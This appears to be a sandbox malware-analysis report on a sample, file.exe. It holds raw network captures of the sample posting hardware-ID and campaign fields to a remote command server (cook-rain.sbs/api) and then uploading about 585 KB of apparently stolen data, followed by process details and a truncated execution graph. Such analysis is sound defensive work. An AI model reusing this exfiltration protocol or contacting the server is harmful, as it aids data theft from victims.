                                                                            5192.168.2.1049736188.114.97.34437748C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-21 12:10:26 UTC271OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=YK33R37UURU
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 1197
                                                                            Host: cook-rain.sbs
                                                                            2024-11-21 12:10:26 UTC1197OUTData Raw: 2d 2d 59 4b 33 33 52 33 37 55 55 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 37 36 44 30 34 34 43 41 30 46 33 45 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 59 4b 33 33 52 33 37 55 55 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 4b 33 33 52 33 37 55 55 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 59 4b 33 33 52 33 37 55 55 52 55
                                                                            Data Ascii: --YK33R37UURUContent-Disposition: form-data; name="hwid"8C76D044CA0F3E1063CFCF7E6C45F838--YK33R37UURUContent-Disposition: form-data; name="pid"1--YK33R37UURUContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--YK33R37UURU
                                                                            2024-11-21 12:10:27 UTC981INHTTP/1.1 200 OK
                                                                            Date: Thu, 21 Nov 2024 12:10:27 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=qmv46jv2e24il5gc98fdh1lila; expires=Mon, 17-Mar-2025 05:57:05 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iQ4tuaaAL39LWHNhNrBA0bCySHyV6LlxUO%2FM2SUN90U6zFkKu5UmWWrDefehv03lVXs79%2B9aHRTWP0jjbNmFvftw42E5nvHkiS%2B9akflR8eWmvPvKPT17QMXt4zCqHGW"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e60939caa29421d-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1594&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2104&delivery_rate=1763285&cwnd=190&unsent_bytes=0&cid=607f5274810e6f9b&ts=726&x=0"
                                                                            2024-11-21 12:10:27 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                            Data Ascii: eok 8.46.123.75
                                                                            2024-11-21 12:10:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.1049744188.114.97.34437748C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-21 12:10:28 UTC275OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=YSONZWT4DXTKH
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 585323
                                                                            Host: cook-rain.sbs
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: 2d 2d 59 53 4f 4e 5a 57 54 34 44 58 54 4b 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 37 36 44 30 34 34 43 41 30 46 33 45 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 59 53 4f 4e 5a 57 54 34 44 58 54 4b 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 53 4f 4e 5a 57 54 34 44 58 54 4b 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 59 53 4f 4e 5a
                                                                            Data Ascii: --YSONZWT4DXTKHContent-Disposition: form-data; name="hwid"8C76D044CA0F3E1063CFCF7E6C45F838--YSONZWT4DXTKHContent-Disposition: form-data; name="pid"1--YSONZWT4DXTKHContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--YSONZ
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: f7 9f 3a 7f d4 a9 56 60 2f 3d 5f 2d 59 a0 59 2b cd 4d c8 5a 99 c5 c0 fb 49 02 45 9f b9 16 7b 08 ee f8 20 e8 e0 93 3d 54 f8 de 63 c2 f4 97 ef d7 bf 35 30 40 79 b6 a6 cb ea b6 93 08 9b 3c a0 27 3a fb 73 a8 c5 0e 81 67 d7 65 9b cd 8d 65 cd 88 40 74 19 58 5c 66 b5 bf d0 60 2b 82 8d 45 14 4b f6 5f d0 01 23 bd e6 06 6b ce b2 0e 99 fa 1e 28 d6 d7 76 99 4b 80 61 b2 0f 6c 0c fc 62 8c 9e 44 f1 d3 7c fd 11 17 35 53 89 92 d0 f7 1d 73 13 1e ad 89 9a 7b f5 bf 95 99 27 89 c0 94 27 84 cc 6f 96 0c e6 c7 6d 51 90 d7 07 d4 a1 56 e5 19 4d 0b 04 45 f1 d7 35 8f 2a b1 1c 17 47 9b bc 08 bd 4c d6 36 ac b0 24 50 89 08 fb 04 32 7c d7 fa 4a ae 01 c6 40 75 82 e4 61 58 5b e3 5b 94 3c ab 16 45 38 bc e0 28 8f be f8 ce b1 55 b6 37 67 06 3d 4b 8b 83 c6 3f 90 19 dc 5f 0b 8c fd cc b6 ef 09
                                                                            Data Ascii: :V`/=_-YY+MZIE{ =Tc50@y<':sgee@tX\f`+EK_#k(vKalbD|5Ss{''omQVME5*GL6$P2|J@uaX[[<E8(U7g=K?_
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: d4 96 b6 68 01 c0 18 74 38 8f e6 fb 42 37 30 bd fb d3 c5 f6 d2 f2 9f a0 d5 a5 a0 d9 5b 94 54 bc cc 01 54 d8 c4 6c 56 7d 82 06 bd ce b0 82 df b9 69 c5 c0 5c 53 4f b8 4a b6 fd 76 76 ec c7 d7 43 a2 b3 6e 18 a0 a3 d7 31 24 98 3e 1a a6 08 c8 e3 1b d0 14 c4 87 36 46 9e ce 27 c4 53 7d 71 df 15 33 c9 97 42 ba 20 c4 2c 21 78 00 c8 74 7f d8 cc fe b0 3d 32 9c 08 ca f3 80 85 73 b5 06 4d da 7b b9 af 39 3f 2a 88 28 f1 c6 b9 a3 4d a8 f8 a6 61 e9 56 e3 5f fa 32 e3 57 cf 6b 23 b3 54 b1 fa 75 ee f9 9d 6a e8 ff 68 f6 7d f7 6a de 12 0a 90 44 6e 91 bf 11 2d 78 c3 a2 5d 22 84 a4 78 c8 e1 94 4c 8e 26 f0 a8 8d 46 04 b8 76 7f eb 6b ce 47 0a 85 92 3a f4 6e 17 59 c3 d5 55 f0 c4 65 8d 11 00 d5 30 5d 66 1b 2d cd 5c 9c 2b 89 78 8f 93 b7 6c 06 7a a4 6e 5b 5b e7 cc bd c5 ee c0 d2 93 24
                                                                            Data Ascii: ht8B70[TTlV}i\SOJvvCn1$>6F'S}q3B ,!xt=2sM{9?*(MaV_2Wk#Tujh}jDn-x]"xL&FvkG:nYUe0]f-\+xlzn[[$
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: ee 65 00 0a 75 86 ff f9 7a f1 c6 96 1f a3 9b 4b ca e3 59 40 7c a4 62 75 02 37 b7 04 05 ea 05 e9 0b 9d 61 b1 5f 6b bc 24 ff f3 72 5e 26 89 6f 0b 6e af 2c 19 36 06 ef 15 65 2e 0e 5d f4 9d 7f 02 f1 fe a4 9a 60 27 e9 a5 41 ad 11 70 fc 2c 06 e0 64 43 19 f9 a7 b2 94 70 c7 46 aa dd 1a 99 22 02 8c 71 61 ba 6d f3 bf a6 27 f2 eb 91 29 6f df 19 f4 70 45 c6 35 d8 78 27 ea f2 2c ed fb ff 6e 31 12 00 25 02 7f 6e 17 d0 02 3d c2 ec 78 53 ba 86 21 98 f5 3f 43 cc 06 9a a8 1d 8b dd c0 4b 8c eb bd 1f e6 84 02 ee 37 7f 59 fc 70 15 e0 5c bf 5b 94 9f 63 0e 31 e9 61 89 13 a0 2d a2 fa 2a a0 b5 ec d8 97 52 c3 4d 54 a2 23 c4 05 a7 b5 e6 0c c0 21 60 aa 8c da b9 4c b0 95 8b 40 1e 2a 7a 2c 15 11 f0 1a f7 e8 05 16 46 57 56 6d c1 29 8c 23 4b 60 a0 f3 b7 25 c8 c9 14 b1 0c e0 fb fb 3b c8
                                                                            Data Ascii: euzKY@|bu7a_k$r^&on,6e.]`'Ap,dCpF"qam')opE5x',n1%n=xS!?CK7Yp\[c1a-*RMT#!`L@*z,FWVm)#K`%;
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: 92 d4 54 a2 3f d8 b9 2e 9b 42 49 cc 3c 33 18 5a ae 23 a5 85 84 84 13 1c 6d 4d b3 32 48 ef 35 e5 22 a2 82 a6 61 e7 8e 88 9f b2 b5 72 b0 52 d6 db 7c 6c f3 8f 13 b9 0f e4 26 69 14 2c d9 f7 47 f0 a1 a5 54 0e 68 9e 43 67 aa 6d 67 ce f0 04 e6 f4 29 82 eb fa 23 2d 43 6c 92 70 9b b0 28 31 0e d8 8c 56 97 20 8e 3b 52 20 51 29 d6 79 9e 58 d1 e3 e0 5a 21 04 db 4e d9 8a d6 f4 8c 9c 64 00 93 5a fb 6c 40 9d e2 58 13 99 7f 2b 0c ef 6f e6 e9 0d 75 93 fb 8b 89 7e 9c 73 fe 98 be 71 62 c2 d0 b4 aa 49 85 fc ad e1 e8 81 a0 ac c6 5f b6 41 18 45 f9 9a 2c e4 5e 7f 58 cc a5 c8 e2 84 d2 a7 e5 6b 98 cd 8e 5e 52 6a a8 b9 a8 6b 00 aa af 94 c6 bd 20 bd 54 2c 6c 04 33 44 52 74 ae 7a 0a 1c c7 ec 14 21 a2 84 cd bc 25 5b 3d f9 ba 42 0f af 16 ae 4d 38 76 67 25 ec f2 4c b3 27 6d 88 72 7a 3d
                                                                            Data Ascii: T?.BI<3Z#mM2H5"arR|l&i,GThCgmg)#-Clp(1V ;R Q)yXZ!NdZl@X+ou~sqbI_AE,^Xk^Rjk T,l3DRtz!%[=BM8vg%L'mrz=
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: a3 36 2d 4d f3 c9 2f ab b5 5c a3 cb 8c 17 02 03 86 5d 5b 68 e0 d0 84 a2 9d 55 48 c8 00 20 9d 51 3c 28 ed 7e d5 cb 61 75 f5 9f 53 af d1 41 c3 4f f7 2e 86 12 f6 0d 14 39 99 17 2e 24 7f c9 60 9f 92 36 e7 9d 7f 25 ad 58 b2 54 3a 49 ff 73 10 c3 9a e0 6a ea 2d cf 59 dc 04 af a7 ab 27 86 f5 0e 00 3a 87 37 74 8a ae 48 a4 a7 73 57 16 fc 8d 44 16 4b f3 36 86 55 04 96 3e 7b 6f cd b2 2a ef c8 27 ec 11 03 4d 52 11 6a be d4 10 b0 45 24 93 68 24 98 2c c9 98 f1 16 97 b1 7d 71 e3 5a cd ae 03 d5 77 4e 1d c3 ab a7 e8 db 00 fa c8 4d c5 69 31 10 ca 65 0e b7 74 ba 7f e1 e6 bf bd 04 7f 2d 0d 62 f6 dc 4e 42 d3 ee 92 b7 fb fd ed c1 e7 13 b0 3b b6 cf 1a e3 dc 24 a5 50 eb 47 aa ab 94 00 cd ef 94 29 02 89 a5 30 52 5f b1 2b f4 d4 79 7f 01 10 c4 87 62 42 a0 e2 2e a0 7c 21 7a 4e 66 7f
                                                                            Data Ascii: 6-M/\][hUH Q<(~auSAO.9.$`6%XT:Isj-Y':7tHsWDK6U>{o*'MRjE$h$,}qZwNMi1et-bNB;$PG)0R_+ybB.|!zNf
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: 28 37 88 78 e4 ef 0f 2a 60 83 f6 f7 d3 b6 e5 3f 3f 32 6e 9c 4a 34 3b f5 4c ed 81 94 86 bd 82 e1 fa a4 53 5b 46 bc c1 28 e5 bb a9 88 a1 84 e1 06 2d a2 0d 5d c5 f1 5d cd 76 e0 ec df fa 46 e5 58 38 a1 58 66 bc c0 2f f3 8a 0d 00 43 ca df 08 d3 9c b2 23 43 af da c4 3c 3f 81 c5 5e e7 54 c3 3b 10 91 23 7b 41 26 46 15 26 74 01 14 04 f1 01 fd 07 c0 c6 72 fe c9 ed 1c 88 32 69 48 fb 72 07 1a 8a 44 c3 ba fb 63 81 29 a9 74 e5 2c 2f 60 34 d0 e3 e5 8e 80 8d e4 99 8c e9 47 ec af 77 3d 35 b1 91 3e b8 fd 78 0c 46 c1 be 27 21 28 85 9b d2 5f 2b 5b 8e fe ea d1 44 7e 7f 82 d5 f2 b3 22 e8 fc 1f 34 ed e2 18 0d 49 a1 c9 8f 8f 80 1e 0d a2 ce 45 90 2f 88 41 cc ba 0d 0c cc bf 7d 01 5b 1f 0a 43 fe 35 27 5d 63 d7 6d 54 d8 3b cc 1b a4 fc 68 06 1d 38 cf 5a 6c 8f 2e 10 d4 05 fb d4 a1 73
                                                                            Data Ascii: (7x*`??2nJ4;LS[F(-]]vFX8Xf/C#C<?^T;#{A&F&tr2iHrDc)t,/`4Gw=5>xF'!(_+[D~"4IE/A}[C5']cmT;h8Zl.s
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: d2 fc f6 e8 8b 59 3e 90 62 77 9f 3a 06 c1 e5 29 6a 40 47 ea 2d a0 ec f1 bd 8d 9a bf 69 86 d8 bb 8d 86 c5 86 cf e9 ad 35 55 7e 20 81 01 6d 4f 15 17 d5 79 2b 41 b7 2a ea 1f 83 d2 eb 60 6b 51 41 fe 9e f6 c9 3c 93 2a 09 4c e1 39 c7 70 92 aa 1e 06 da 22 a2 f4 f5 d0 b2 42 bb b3 62 ef 54 59 76 1c 94 b9 1a 24 35 3d 75 da b8 86 84 60 29 97 83 8a b0 1a 3a 5d 3e 81 9c 00 12 84 c9 b4 f2 d9 d6 a0 53 3f ab 0e ee 50 a0 2b ce 8b a3 6e 9f 8b 41 91 f8 b5 50 97 24 6a 26 ac bc d1 d6 c9 80 e8 48 40 70 37 43 47 03 df 1d 09 17 93 df a4 3c 67 67 ee 52 9e 16 c4 b0 d0 8b 56 8d 99 9a c8 0f 9a 90 e2 39 fa 08 b7 82 5b c6 6d ce 2a 55 44 bb 46 dd ff 56 11 b4 03 f3 46 a0 ad e1 71 ed 2c 09 36 52 e7 12 71 d7 dd 64 ee 18 85 eb 9b 85 42 ab c4 9c 4f 98 c8 9a 14 47 de 59 cf 0b 38 5b 04 57 0e
                                                                            Data Ascii: Y>bw:)j@G-i5U~ mOy+A*`kQA<*L9p"BbTYv$5=u`):]>S?P+nAP$j&H@p7CG<ggRV9[m*UDFVFq,6RqdBOGY8[W
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: 03 17 f6 65 5e 23 3e 5c 1e 96 9d d5 97 88 be 51 67 95 0a 4d 5b 68 2a 28 a4 9f 78 c0 bb d1 a5 9d a3 52 a3 8e 82 95 22 b2 1f 2c be 63 d8 66 fd ea ac 31 08 ab ca 1a 73 e0 97 fa d0 d4 f6 05 20 29 41 06 a5 0d c8 a5 8a cd 0b 46 62 92 05 9b 6a e3 ad 72 ce 76 65 7b 5a ef 78 8e d3 97 a1 8c 9f a7 0e 55 db 8c fd 85 f1 e3 c6 d7 35 de f1 99 60 bd c5 5c 8d bd 33 bf b2 40 a3 a0 e7 ef b3 9f f6 be bc 59 89 5e 70 e8 db 7c dd af e7 7a f0 b9 c1 ed 7f ef 5c 92 4b 1b 3c c4 dd 43 dc fa b7 48 15 fa 63 02 6f 8a 30 f5 41 b2 2e 81 6c 79 0e f9 22 c8 d3 76 78 c9 f2 39 c2 ba 22 e8 a6 fd 12 51 8f 8f 72 63 25 62 25 c1 45 7d 27 9a 9d 38 f3 f5 48 6b 29 e7 3c cb 5b 78 70 ea b4 81 04 59 a5 2f b9 53 b2 2a 45 f3 a9 ab 4a 35 43 c2 97 19 a6 f2 35 30 38 7b 3e 00 87 ed 6c 18 a3 cd 09 08 50 d5 8a
                                                                            Data Ascii: e^#>\QgM[h*(xR",cf1s )AFbjrve{ZxU5`\3@Y^p|z\K<CHco0A.ly"vx9"Qrc%b%E}'8Hk)<[xpY/S*EJ5C508{>lP
                                                                            2024-11-21 12:10:28 UTC15331OUTData Raw: af bc d6 d4 cb 09 2a a0 54 ce 54 4b a4 75 d4 c7 ca 2c 65 a4 86 ec a9 ba f2 bd 70 bd aa cc f1 5b 04 68 fe f7 8e f8 40 72 fb 05 4e 0e 67 eb 93 c6 3f 1d 47 92 ed be fc 9b fd 29 ed ea f3 66 94 ac ef fd c6 a3 e7 f9 d7 6c 3e 79 f4 bd 55 b0 73 59 78 e1 66 39 75 ae fb 95 66 cf ad 49 9b 70 1d 74 5d d6 2b 42 98 61 a0 6b 86 e9 6e c5 c2 12 99 c0 0b be f9 f9 ca b3 3a 8e a6 0c 0f c3 86 ff 92 dc 5f 69 14 e7 1c 95 7a 08 cf 67 75 bc 56 15 29 d9 98 41 f1 b4 ec bf 8e 97 f8 50 33 87 23 25 6d 2a 75 00 be 73 47 45 47 fe b3 8a 50 44 3c 7a 49 a3 3c 7f fc 49 11 8e c6 21 fb 29 0d 66 8b 02 a0 44 ba c7 2e 39 ac b8 74 63 4d c9 f6 cb 01 97 24 7d ac 85 5b 3b 5a e9 1f fc ac 16 bb 2e f1 a1 2d 26 05 b6 64 cd d9 ab 07 46 3a 18 5f fa 7d f5 e6 9e 9c fa 55 b5 b2 98 d4 be 18 24 bc c0 5c c8 dc
                                                                            Data Ascii: *TTKu,ep[h@rNg?G)fl>yUsYxf9ufIpt]+Bakn:_izguV)AP3#%m*usGEGPD<zI<I!)fD.9tcM$}[;Z.-&dF:_}U$\
                                                                            2024-11-21 12:10:32 UTC990INHTTP/1.1 200 OK
                                                                            Date: Thu, 21 Nov 2024 12:10:32 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=h75pap3q5ua7b6aqkg9a5b5ecm; expires=Mon, 17-Mar-2025 05:57:09 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FLqXvNLX%2BMlWW%2FwS1cdB%2FrQ7VjHOhUZM1agkugCVRF058vPv1jBQdod2bYinteAOV8Qt01bWama5xuWcJvUXu2Y2i2ZtdOF8Utr1uex1Vp6CYOKpw7CwDg3lSFcS%2Fxvb"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e6093ac4dab8c0c-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1868&sent=329&recv=614&lost=0&retrans=0&sent_bytes=2829&recv_bytes=587906&delivery_rate=1574123&cwnd=206&unsent_bytes=0&cid=aa5f2890b2d238bb&ts=3644&x=0"


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:07:10:11
                                                                            Start date:21/11/2024
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0x330000
                                                                            File size:1'843'200 bytes
                                                                            MD5 hash:02FC2C82DE8B775D97A32A39E1D34960
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:57.5%
                                                                              Total number of Nodes:233
                                                                              Total number of Limit Nodes:13
                                                                              execution_graph 6401 33e711 6402 33e710 6401->6402 6402->6401 6405 33e728 6402->6405 6407 36e470 LdrInitializeThunk 6402->6407 6404 33e7c8 6405->6404 6408 36e470 LdrInitializeThunk 6405->6408 6407->6405 6408->6404 6159 33dcb7 6160 33dcbd 6159->6160 6161 33dccc CoUninitialize 6160->6161 6162 33dd00 6161->6162 6163 348550 6166 36bb70 6163->6166 6167 36bba0 6166->6167 6169 36bbfe 6167->6169 6174 36e470 LdrInitializeThunk 6167->6174 6169->6169 6171 348578 6169->6171 6173 36bcee 6169->6173 6175 36e470 LdrInitializeThunk 6169->6175 6176 36bab0 6173->6176 6174->6169 6175->6173 6177 36bb61 6176->6177 6178 36bac8 6176->6178 6177->6171 6178->6178 6179 36bb4c RtlFreeHeap 6178->6179 6179->6177 6409 34cfb0 6410 34cff0 6409->6410 6410->6410 6411 33b6e0 2 API calls 6410->6411 6412 34d1e8 6411->6412 6447 33d7d7 6448 33d7e2 6447->6448 6449 36bab0 RtlFreeHeap 6448->6449 6450 33d832 6449->6450 6393 33e5d6 6394 33e5f0 6393->6394 6395 33e62a 6394->6395 6399 36e470 LdrInitializeThunk 6394->6399 6398 33e69a 6395->6398 6400 36e470 LdrInitializeThunk 6395->6400 6399->6395 6400->6398 6180 33da95 6181 33dab0 6180->6181 6184 33dafe 6181->6184 6221 36e470 LdrInitializeThunk 6181->6221 6183 33db8e 6194 354800 6183->6194 6184->6183 6222 36e470 LdrInitializeThunk 6184->6222 6187 33dbd9 6203 354ee0 6187->6203 6189 33dbf9 6207 355150 6189->6207 6191 33dc19 6213 357e50 6191->6213 6193 33dc42 6196 354860 6194->6196 6195 3549a2 6195->6187 6196->6195 6223 370ba0 6196->6223 6198 354c27 6198->6198 6200 354c38 6198->6200 6227 352ba0 6198->6227 6200->6187 6200->6200 6201 354aa1 6201->6198 6201->6200 6201->6201 6202 370ba0 LdrInitializeThunk 6201->6202 6202->6198 6204 354f90 6203->6204 6206 355122 6204->6206 6248 350cd0 6204->6248 6206->6189 6208 35515e 6207->6208 6254 371160 6208->6254 6210 355228 6211 355140 6210->6211 6258 3715b0 6210->6258 6211->6191 6214 357e80 6213->6214 6217 357ece 6214->6217 6269 36e470 LdrInitializeThunk 6214->6269 6215 357fc0 6215->6193 6217->6215 6220 357fbe 6217->6220 6270 36e470 LdrInitializeThunk 6217->6270 6218 36bab0 RtlFreeHeap 6218->6215 6220->6218 6221->6184 6222->6183 6224 370bc0 6223->6224 6225 370cfe 6224->6225 6239 36e470 LdrInitializeThunk 6224->6239 6225->6201 6240 3709e0 6227->6240 6229 3534a6 6229->6200 6230 352be0 6230->6229 6236 352d09 6230->6236 6244 36e470 LdrInitializeThunk 6230->6244 6232 3533c4 6233 36bab0 RtlFreeHeap 6232->6233 6234 3533d4 6233->6234 6234->6229 6246 36e470 LdrInitializeThunk 6234->6246 6236->6232 6238 36bab0 RtlFreeHeap 6236->6238 6245 36e470 LdrInitializeThunk 6236->6245 6238->6236 6239->6225 6241 370a00 6240->6241 6242 370b4e 6241->6242 6247 36e470 LdrInitializeThunk 6241->6247 6242->6230 6244->6230 6245->6236 6246->6234 6247->6242 6252 350ce0 6248->6252 6249 370ba0 LdrInitializeThunk 6250 350db9 6249->6250 6250->6250 6251 352ba0 2 API calls 6250->6251 6253 350d96 6250->6253 6251->6253 6252->6249 6252->6250 6252->6253 6253->6206 6256 371180 6254->6256 6255 37126f 6255->6210 6256->6255 6266 36e470 LdrInitializeThunk 6256->6266 6260 3715e0 6258->6260 6259 3718b4 6259->6210 6263 37163e 6260->6263 6267 36e470 LdrInitializeThunk 6260->6267 6262 36bab0 RtlFreeHeap 6262->6259 6263->6259 6265 37170e 6263->6265 6268 36e470 LdrInitializeThunk 6263->6268 6265->6262 6266->6255 6267->6263 6268->6265 6269->6217 6270->6220 6271 33cef5 6272 33cf10 6271->6272 6275 369310 6272->6275 6274 33cf48 6274->6274 6276 369370 6275->6276 6276->6276 6278 36949f SysAllocString 6276->6278 6281 369953 6276->6281 6277 369985 GetVolumeInformationW 6282 3699a3 6277->6282 6279 3694cf 6278->6279 6280 3694d7 CoSetProxyBlanket 6279->6280 6279->6281 6280->6281 6284 3694f7 6280->6284 6281->6277 6282->6274 6283 369941 SysFreeString SysFreeString 6283->6281 6284->6283 6285 36e3d0 6286 36e456 6285->6286 6287 36e3ec 6285->6287 6289 36e3fa 6285->6289 6290 36e44b 6285->6290 6288 36bab0 RtlFreeHeap 6286->6288 6287->6286 6287->6289 6288->6290 6289->6289 6291 36e436 RtlReAllocateHeap 6289->6291 6291->6290 6355 33a874 6356 33a970 6355->6356 6356->6356 6359 33b6e0 6356->6359 6360 33b770 6359->6360 6361 33a9db 6360->6361 6363 36e3d0 6360->6363 6364 36e456 6363->6364 6365 36e3ec 6363->6365 6367 36e3fa 6363->6367 6368 36e44b 6363->6368 6366 36bab0 RtlFreeHeap 6364->6366 6365->6364 6365->6367 6366->6368 6367->6367 6369 36e436 RtlReAllocateHeap 6367->6369 6368->6361 6369->6368 6451 370fd0 6452 371000 6451->6452 6455 371068 6452->6455 6457 36e470 LdrInitializeThunk 6452->6457 6453 37111e 6455->6453 6458 36e470 LdrInitializeThunk 6455->6458 6457->6455 6458->6453 6385 33adbd 6386 36bab0 RtlFreeHeap 6385->6386 6387 33adcf 6386->6387 6292 33cec3 CoInitializeSecurity 6293 338f20 6295 338f2f 6293->6295 6294 339146 ExitProcess 6295->6294 6296 339141 6295->6296 6299 33bd80 FreeLibrary 6295->6299 6302 36e3b0 6296->6302 6300 33bd9c 6299->6300 6301 33bda1 FreeLibrary 6300->6301 6301->6296 6305 36fb50 6302->6305 6304 36e3b5 FreeLibrary 6304->6294 6306 36fb59 6305->6306 6306->6304 6307 350ea0 6308 350f41 6307->6308 6321 348940 6308->6321 6310 351013 6311 348940 LdrInitializeThunk 6310->6311 6312 351100 6311->6312 6313 348940 LdrInitializeThunk 6312->6313 6314 3512bc 6313->6314 6315 348940 LdrInitializeThunk 6314->6315 6316 351414 6315->6316 6317 348940 LdrInitializeThunk 6316->6317 6318 3514f1 6317->6318 6319 348940 LdrInitializeThunk 6318->6319 6320 351619 6319->6320 6323 348960 6321->6323 6322 3709e0 LdrInitializeThunk 6324 348a2a 6322->6324 6323->6322 6323->6323 6325 348a55 6324->6325 6328 348a89 6324->6328 6330 348a9f 6324->6330 6337 370d50 6324->6337 6325->6328 6325->6330 6331 370e30 6325->6331 6328->6330 6341 36e470 LdrInitializeThunk 6328->6341 6330->6310 6330->6330 6332 370e60 6331->6332 6332->6332 6334 370ebe 6332->6334 6342 36e470 LdrInitializeThunk 6332->6342 6335 370f7e 6334->6335 6343 36e470 LdrInitializeThunk 6334->6343 6335->6328 6338 370d80 6337->6338 6339 370dde 6338->6339 6344 36e470 LdrInitializeThunk 6338->6344 6339->6325 6341->6330 6342->6334 6343->6335 6344->6339 6418 369fe0 6419 369c4b 6418->6419 6420 369c3a 6418->6420 6424 369bd0 6418->6424 6434 36bfc0 6420->6434 6421 36bf10 LdrInitializeThunk 6421->6424 6422 369c8c 6425 36bab0 RtlFreeHeap 6422->6425 6424->6419 6424->6420 6424->6421 6424->6422 6430 36bdd0 6424->6430 6428 369c92 6425->6428 6427 369cfe 6428->6427 6442 36e470 LdrInitializeThunk 6428->6442 6431 36be9e 6430->6431 6432 36bde1 6430->6432 6431->6424 6432->6431 6443 36e470 LdrInitializeThunk 6432->6443 6435 36c050 6434->6435 6436 36bfd2 6434->6436 6435->6419 6436->6435 6439 36c04e 6436->6439 6444 36e470 LdrInitializeThunk 6436->6444 6438 36c14e 6438->6435 6438->6438 6446 36e470 